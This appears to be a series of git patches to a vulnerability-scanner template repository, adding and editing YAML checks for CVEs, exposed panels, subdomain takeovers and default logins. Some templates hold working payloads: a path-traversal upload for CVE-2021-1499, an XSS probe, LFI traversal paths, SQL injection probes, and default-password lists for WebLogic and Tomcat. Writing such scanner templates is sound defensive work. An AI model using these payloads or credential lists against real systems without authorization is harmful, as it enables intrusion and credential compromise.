a/apis/visualstudio.yaml b/apis/visualstudio.yaml index b53d16d475..93df5620a3 100644 --- a/apis/visualstudio.yaml +++ b/apis/visualstudio.yaml @@ -14,6 +14,7 @@ requests: headers: Content-Type: application/json X-Api-Token: "{{token}}" + matchers: - type: word part: body diff --git a/apis/wakatime.yaml b/apis/wakatime.yaml index d3682c3708..8dee8ffbe4 100644 --- a/apis/wakatime.yaml +++ b/apis/wakatime.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" + matchers: - type: status status: diff --git a/apis/weglot.yaml b/apis/weglot.yaml index 14d5926d4c..e42fd12eb0 100644 --- a/apis/weglot.yaml +++ b/apis/weglot.yaml @@ -14,6 +14,7 @@ requests: headers: Content-Type: application/json body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" + matchers: - type: word part: body diff --git a/apis/youtube.yaml b/apis/youtube.yaml index e348402b76..1f7ed899ff 100644 --- a/apis/youtube.yaml +++ b/apis/youtube.yaml @@ -12,6 +12,7 @@ requests: path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" matchers-condition: or + matchers: - type: word part: body From 75172e9c8023b6b8be2fd8f9d809be0cbf526fd3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 2 Oct 2021 02:30:00 +0530 Subject: [PATCH 2693/4083] minor update --- apis/README.md | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/apis/README.md b/apis/README.md index 403b61d3a1..66c544fcdf 100644 --- a/apis/README.md +++ b/apis/README.md @@ -1,15 +1,13 @@ ## About -This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By placing the token in `token.txt`, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). +This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). ## Usage -You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `apis` directory assumes the input API token will be placed in a file called `token.txt`. The `token.txt` file can exist in your current working directory or in the same directory as the template `yaml` file. +You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `apis` directory assumes the input API token will be provided using CLI `var` flag. ```bash -# Input the token into token.txt: -$ echo -n "thisIsMySecretTokenThatIWantToTest" > token.txt - # Run Nuclei specifying all the api templates: -$ nuclei -u "null" -t ./nuclei-templates/apis/ + +nuclei -u null -t apis/ -var token=thisIsMySecretTokenThatIWantToTest ``` ## Credits From 2f99b4165a774c6a769a90f1b527ff26f0bf9d50 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 2 Oct 2021 04:33:14 +0530 Subject: [PATCH 2694/4083] misc update --- cves/2018/CVE-2018-0127.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2018/CVE-2018-0127.yaml b/cves/2018/CVE-2018-0127.yaml index ab31e8d430..dce6304d1d 100644 --- a/cves/2018/CVE-2018-0127.yaml +++ b/cves/2018/CVE-2018-0127.yaml @@ -1,26 +1,27 @@ id: CVE-2018-0127 + info: - name: Cisco RV132W and RV134W Wireless VPN Routers Unauthenticated Information Disclosure Vulnerability + name: Cisco RV132W and RV134W Router Information Disclosure author: jrolf severity: critical - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 - description: Detects Cisco devices vulnerable to CVE-2018-0127 - tags: cve,cve2018,cisco + description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information. + tags: cve,cve2018,cisco,router requests: - method: GET path: - "{{BaseURL}}/dumpmdm.cmd" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Dump" - "MDM" - "cisco" - "admin" - part: body + part: body \ No newline at end of file From fa947061ee5539e00f8675f860060b46c856505f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Oct 2021 23:05:32 +0000 Subject: [PATCH 2695/4083] Auto Generated CVE annotations [Fri Oct 1 23:05:32 UTC 2021] :robot: --- cves/2018/CVE-2018-0127.yaml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/cves/2018/CVE-2018-0127.yaml b/cves/2018/CVE-2018-0127.yaml index dce6304d1d..81f3f82937 100644 --- a/cves/2018/CVE-2018-0127.yaml +++ b/cves/2018/CVE-2018-0127.yaml @@ -6,6 +6,15 @@ info: severity: critical description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information. tags: cve,cve2018,cisco,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-0127 + cwe-id: CWE-306 + reference: + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 + - http://www.securitytracker.com/id/1040345 + - http://www.securityfocus.com/bid/102969 requests: - method: GET From e08ccf85db87671afc1219b8bc2b3ebd97f22123 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 2 Oct 2021 04:37:10 +0530 Subject: [PATCH 2696/4083] adding missing condition --- exposures/tokens/digitalocean/tugboat-config-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/digitalocean/tugboat-config-exposure.yaml b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml index e5ca51b07c..50793f616a 100644 --- a/exposures/tokens/digitalocean/tugboat-config-exposure.yaml +++ b/exposures/tokens/digitalocean/tugboat-config-exposure.yaml @@ -13,8 +13,8 @@ requests: path: - "{{BaseURL}}/.tugboat" + matchers-condition: and matchers: - - type: status status: - 200 From 5618fcaa7ebcb2f73946e40955d45b422a34885a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 2 Oct 2021 04:41:32 +0530 Subject: [PATCH 2697/4083] Update axiom-digitalocean-key-exposure.yaml --- .../tokens/digitalocean/axiom-digitalocean-key-exposure.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml index 01297d796c..2ac3268256 100644 --- a/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml +++ b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml @@ -18,12 +18,14 @@ requests: - type: status status: - 200 + - type: word words: - "do_key" - "region" - "imageid" condition: and + extractors: - type: regex part: body From c285dfc14a129b2f103ba1bfac71e010d945bca9 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 2 Oct 2021 13:34:54 +0900 Subject: [PATCH 2698/4083] Create flexbe-takeover.yaml --- flexbe-takeover.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 flexbe-takeover.yaml diff --git a/flexbe-takeover.yaml b/flexbe-takeover.yaml new file mode 100644 index 0000000000..c9fcb234ed --- /dev/null +++ b/flexbe-takeover.yaml @@ -0,0 +1,23 @@ +id: flexbe-takeover + +info: + name: Flexbe Subdomain Takeover + author: 0x_Akoko + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - Domain isn't configured + + - type: status + status: + - 404 From 8185a0e9c0e56c34ca2a7758a67959f0e2660c0b Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 2 Oct 2021 03:24:29 -0300 Subject: [PATCH 2699/4083] Update CVE-2020-2036.yaml --- cves/2020/CVE-2020-2036.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index aaf9f7972d..c9f1a5f9ca 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -18,7 +18,8 @@ requests: path: - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - + + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -33,4 +34,4 @@ requests: - type: word words: - "text/html" - part: header \ No newline at end of file + part: header From e3947fbfeb19a09677e2fe30415b0a3051fd8070 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 2 Oct 2021 03:29:17 -0300 Subject: [PATCH 2700/4083] Update wp-plugin-1-flashgallery-listing.yaml --- .../wordpress/wp-plugin-1-flashgallery-listing.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml b/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml index 91f280207d..852896ef89 100644 --- a/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml +++ b/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/" - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -24,4 +25,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 8fc91de606d989d68364a6f44b3eb5781e1375ac Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Sat, 2 Oct 2021 03:42:22 -0300 Subject: [PATCH 2701/4083] Update metinfo-lfi.yaml --- vulnerabilities/other/metinfo-lfi.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index 9a794bbcb0..e936256488 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -12,7 +12,8 @@ requests: - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' - + + stop-at-first-match: true matchers-condition: and matchers: - type: word From 1b3807a94d31703b328eace6dd8a9efb9f168917 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 2 Oct 2021 16:29:55 +0900 Subject: [PATCH 2702/4083] Create CVE-2021-1499.yaml A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-1499.yaml | 53 ++++++++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 cves/2021/CVE-2021-1499.yaml diff --git a/cves/2021/CVE-2021-1499.yaml b/cves/2021/CVE-2021-1499.yaml new file mode 100644 index 0000000000..6ced9aa918 --- /dev/null +++ b/cves/2021/CVE-2021-1499.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-1499 + +info: + name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability + description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. + author: gy741 + severity: medium + reference: + - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 + tags: cve,cve2021,cisco,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.3 + cve-id: CVE-2021-1499 + cwe-id: CWE-306 + +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 + Origin: https://{{Hostname}} + Connection: close + Referer: https://{{Hostname}}/ + + -----------------------------253855577425106594691130420583 + Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" + Content-Type: application/json + + MyPasswdNewData->/api/tomcat + + -----------------------------253855577425106594691130420583-- + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header + + - type: word + words: + - "result" + - "/tmp/passwd9" + condition: and From ada6fcef43f5055aad9f298131a7e88e2deab3d6 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 2 Oct 2021 17:56:42 +0530 Subject: [PATCH 2703/4083] Update CVE-2020-2036.yaml --- cves/2020/CVE-2020-2036.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index c9f1a5f9ca..f55ef3b1b9 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml @@ -18,7 +18,7 @@ requests: path: - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - + stop-at-first-match: true matchers-condition: and matchers: From f43b256e6edd3274481cd0bd53bd52b197bc08be Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 2 Oct 2021 17:57:33 +0530 Subject: [PATCH 2704/4083] Update metinfo-lfi.yaml --- vulnerabilities/other/metinfo-lfi.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index e936256488..2ce4187b69 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -12,15 +12,17 @@ requests: - '{{BaseURL}}/include/thumb.php?dir=http/.....///.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=.....///http/.....///config/config_db.php' - '{{BaseURL}}/include/thumb.php?dir=http\\..\\..\\config\\config_db.php' - + stop-at-first-match: true matchers-condition: and matchers: + - type: word words: - "con_db_pass" - "con_db_name" part: body + condition: and - type: status status: From 47853b869bcd93278ce3d604eee7ab1803cb5776 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 2 Oct 2021 17:57:59 +0530 Subject: [PATCH 2705/4083] Update metinfo-lfi.yaml --- vulnerabilities/other/metinfo-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index 2ce4187b69..afe3572164 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -22,8 +22,8 @@ requests: - "con_db_pass" - "con_db_name" part: body - condition: and + - type: status status: - 200 From ed2c42e833541b20558c4bbecb7d7a88b51c525b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 2 Oct 2021 12:30:44 +0000 Subject: [PATCH 2706/4083] Auto Generated CVE annotations [Sat Oct 2 12:30:44 UTC 2021] :robot: --- cves/2021/CVE-2021-40868.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml index ac23724b91..c688da0f0f 100644 --- a/cves/2021/CVE-2021-40868.yaml +++ b/cves/2021/CVE-2021-40868.yaml @@ -9,6 +9,11 @@ info: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 tags: cve,cve2021,xss,cloudron + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-40868 + cwe-id: CWE-79 requests: - method: GET From f0334585240ec1f28cd6c8a569165ae2121d24a3 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 2 Oct 2021 18:02:45 +0530 Subject: [PATCH 2707/4083] misc update --- cves/2021/CVE-2021-1499.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-1499.yaml b/cves/2021/CVE-2021-1499.yaml index 6ced9aa918..69983db2f4 100644 --- a/cves/2021/CVE-2021-1499.yaml +++ b/cves/2021/CVE-2021-1499.yaml @@ -8,7 +8,7 @@ info: reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 - tags: cve,cve2021,cisco,rce,oob + tags: cve,cve2021,cisco classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 5.3 @@ -23,9 +23,8 @@ requests: Accept: */* Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 - Origin: https://{{Hostname}} - Connection: close - Referer: https://{{Hostname}}/ + Origin: {{RootURL}} + Referer: {{RootURL}} -----------------------------253855577425106594691130420583 Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" From 1fe4181bcef30f886f1fc5aa32d469a663532f20 Mon Sep 17 00:00:00 2001 From: commiter Date: Sat, 2 Oct 2021 22:29:47 +0800 Subject: [PATCH 2708/4083] [weblogic-weak-login] support multiple password combinations --- .../weblogic/weblogic-weak-login.yaml | 23 ++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/default-logins/weblogic/weblogic-weak-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml index e49f60202c..295f30487d 100644 --- a/default-logins/weblogic/weblogic-weak-login.yaml +++ b/default-logins/weblogic/weblogic-weak-login.yaml @@ -18,7 +18,28 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8 + j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 + + payloads: + username: + - weblogic + - weblogic + - weblogic + - weblogic + - admin + - admin + - system + + password: + - weblogic + - weblogic1 + - welcome1 + - Oracle@123 + - 12345678 + - security + - password + + attack: pitchfork cookie-reuse: true matchers-condition: and From 62ce06e1090324924cd0ed2f57fc3893df455dd1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 2 Oct 2021 20:08:29 +0530 Subject: [PATCH 2709/4083] misc update --- flexbe-takeover.yaml => takeovers/flexbe-takeover.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) rename flexbe-takeover.yaml => takeovers/flexbe-takeover.yaml (56%) diff --git a/flexbe-takeover.yaml b/takeovers/flexbe-takeover.yaml similarity index 56% rename from flexbe-takeover.yaml rename to takeovers/flexbe-takeover.yaml index c9fcb234ed..e167a4d855 100644 --- a/flexbe-takeover.yaml +++ b/takeovers/flexbe-takeover.yaml @@ -4,8 +4,10 @@ info: name: Flexbe Subdomain Takeover author: 0x_Akoko severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 + tags: takeover,flexbe + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 + - https://help.flexbe.com/domains/ requests: - method: GET @@ -15,8 +17,10 @@ requests: matchers-condition: and matchers: - type: word + condition: and words: - - Domain isn't configured + - "Domain isn't configured" + - "flexbe" - type: status status: From 670e3fe10041274a15131920dff9eb78b5ffb2ab Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 2 Oct 2021 22:16:40 +0700 Subject: [PATCH 2710/4083] Create CVE-2021-41648.yaml --- cves/2021/CVE-2021-41648.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-41648.yaml diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml new file mode 100644 index 0000000000..450098e959 --- /dev/null +++ b/cves/2021/CVE-2021-41648.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-41648 + +info: + name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php + author: daffainfo + severity: high + description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input. + reference: https://github.com/MobiusBinary/CVE-2021-41648 + tags: sqli,cve,cve2021 + +requests: + - method: POST + path: + - "{{BaseURL}}/action.php" + body: | + proId=1'&addToCart=1 + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/html" + part: header + + - type: word + words: + - "Warning: mysqli_num_rows() expects parameter 1 to be" + part: body + condition: and + + - type: status + status: + - 200 From c6fbeaebc586931173938a16d7b0a38458080e25 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 2 Oct 2021 22:22:04 +0700 Subject: [PATCH 2711/4083] Create CVE-2021-41648.yaml --- cves/2021/CVE-2021-41648.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2021/CVE-2021-41648.yaml diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml new file mode 100644 index 0000000000..6b50cb8df0 --- /dev/null +++ b/cves/2021/CVE-2021-41648.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-41648 + +info: + name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php + author: daffainfo + severity: high + description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. + reference: https://github.com/MobiusBinary/CVE-2021-41649 + tags: sqli,cve,cve2021 + +requests: + - method: POST + path: + - "{{BaseURL}}/homeaction.php" + body: | + cat_id=4'&get_seleted_Category=1 + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/html" + part: header + + - type: word + words: + - "Warning: mysqli_num_rows() expects parameter 1 to be" + part: body + condition: and + + - type: status + status: + - 200 From def48d77da6d9255f8f98ba9e935f389c4bd09e9 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 2 Oct 2021 15:05:20 -0300 Subject: [PATCH 2712/4083] Create secmail-panel.yaml --- exposed-panels/secmail-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/secmail-panel.yaml diff --git a/exposed-panels/secmail-panel.yaml b/exposed-panels/secmail-panel.yaml new file mode 100644 index 0000000000..b3b68c21d3 --- /dev/null +++ b/exposed-panels/secmail-panel.yaml @@ -0,0 +1,24 @@ +id: secmail-detect + +info: + name: Detect SecMail - secure email + author: johnk3r + severity: info + reference: https://www.shodan.io/search?query=secmail + tags: secmail,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/SecMail/login.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - "requestKey.jsp" + part: body + + - type: status + status: + - 200 From 8f0251f8c31120130f94922b72484094675d9c66 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 2 Oct 2021 15:12:17 -0300 Subject: [PATCH 2713/4083] Create okiko-sfiler-portal.yaml --- exposed-panels/okiko-sfiler-portal.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/okiko-sfiler-portal.yaml diff --git a/exposed-panels/okiko-sfiler-portal.yaml b/exposed-panels/okiko-sfiler-portal.yaml new file mode 100644 index 0000000000..e80b7acefd --- /dev/null +++ b/exposed-panels/okiko-sfiler-portal.yaml @@ -0,0 +1,23 @@ +id: okiko-sfiler + +info: + name: Detect OKIKO S-Filer Portal + author: johnk3r + reference: https://www.shodan.io/search?query=sfiler + severity: info + tags: okiko,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/sfiler/Login.action" + + matchers-condition: and + matchers: + - type: word + words: + - "okiok" + part: body + - type: status + status: + - 200 From f6f679ee648663966643a95d22459857b95d70aa Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sat, 2 Oct 2021 15:19:57 -0300 Subject: [PATCH 2714/4083] Update okiko-sfiler-portal.yaml --- exposed-panels/okiko-sfiler-portal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/okiko-sfiler-portal.yaml b/exposed-panels/okiko-sfiler-portal.yaml index e80b7acefd..d9b363c180 100644 --- a/exposed-panels/okiko-sfiler-portal.yaml +++ b/exposed-panels/okiko-sfiler-portal.yaml @@ -1,4 +1,4 @@ -id: okiko-sfiler +id: okiko-sfiler-portal info: name: Detect OKIKO S-Filer Portal From 0916b9eda87480d6f8dd69f62bc1f1d42d98068f Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 3 Oct 2021 00:12:07 +0530 Subject: [PATCH 2715/4083] misc update --- default-logins/weblogic/weblogic-weak-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/default-logins/weblogic/weblogic-weak-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml index 295f30487d..299e2a137e 100644 --- a/default-logins/weblogic/weblogic-weak-login.yaml +++ b/default-logins/weblogic/weblogic-weak-login.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high tags: default-login,weblogic - reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/weak_password + reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password requests: - raw: @@ -20,6 +20,7 @@ requests: j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 + attack: pitchfork payloads: username: - weblogic @@ -39,8 +40,7 @@ requests: - security - password - attack: pitchfork - + stop-at-first-match: true cookie-reuse: true matchers-condition: and matchers: From 9b33d3f61a6d73098b87c7a5a4a01e669f36ee3b Mon Sep 17 00:00:00 2001 From: commiter Date: Sun, 3 Oct 2021 16:38:57 +0800 Subject: [PATCH 2716/4083] [weblogic-weak-login/tomcat-default-login] adding more combinations --- default-logins/apache/tomcat-default-login.yaml | 4 ++++ default-logins/weblogic/weblogic-weak-login.yaml | 2 ++ 2 files changed, 6 insertions(+) diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 49a6417b07..9b4556e810 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -30,6 +30,8 @@ requests: - tomcat - admin - role1 + - both + - admin password: - tomcat @@ -48,6 +50,8 @@ requests: - changethis - j5Brn9 - tomcat + - tomcat + - 123456 attack: pitchfork # Available options: sniper, pitchfork and clusterbomb diff --git a/default-logins/weblogic/weblogic-weak-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml index 299e2a137e..272933d9cf 100644 --- a/default-logins/weblogic/weblogic-weak-login.yaml +++ b/default-logins/weblogic/weblogic-weak-login.yaml @@ -27,6 +27,7 @@ requests: - weblogic - weblogic - weblogic + - weblogic - admin - admin - system @@ -36,6 +37,7 @@ requests: - weblogic1 - welcome1 - Oracle@123 + - weblogic123 - 12345678 - security - password From c64937c70e29146e8f9968e02e7eccf2a75f81d7 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 3 Oct 2021 17:46:22 +0700 Subject: [PATCH 2717/4083] Update and rename CVE-2021-41648.yaml to CVE-2021-41649.yaml --- cves/2021/{CVE-2021-41648.yaml => CVE-2021-41649.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename cves/2021/{CVE-2021-41648.yaml => CVE-2021-41649.yaml} (97%) diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41649.yaml similarity index 97% rename from cves/2021/CVE-2021-41648.yaml rename to cves/2021/CVE-2021-41649.yaml index 6b50cb8df0..b6ec73e729 100644 --- a/cves/2021/CVE-2021-41648.yaml +++ b/cves/2021/CVE-2021-41649.yaml @@ -1,4 +1,4 @@ -id: CVE-2021-41648 +id: CVE-2021-41649 info: name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php From 55b0673d277c539d22f4e48318441416b16e2f3d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 3 Oct 2021 16:49:06 +0530 Subject: [PATCH 2718/4083] Added IBM Websphere Friendly Path Exposure Co-Authored-By: clarkvoss <32307041+clarkvoss@users.noreply.github.com> --- .../ibm-friendly-path-exposure.yaml | 36 +++++++++++++++++++ 1 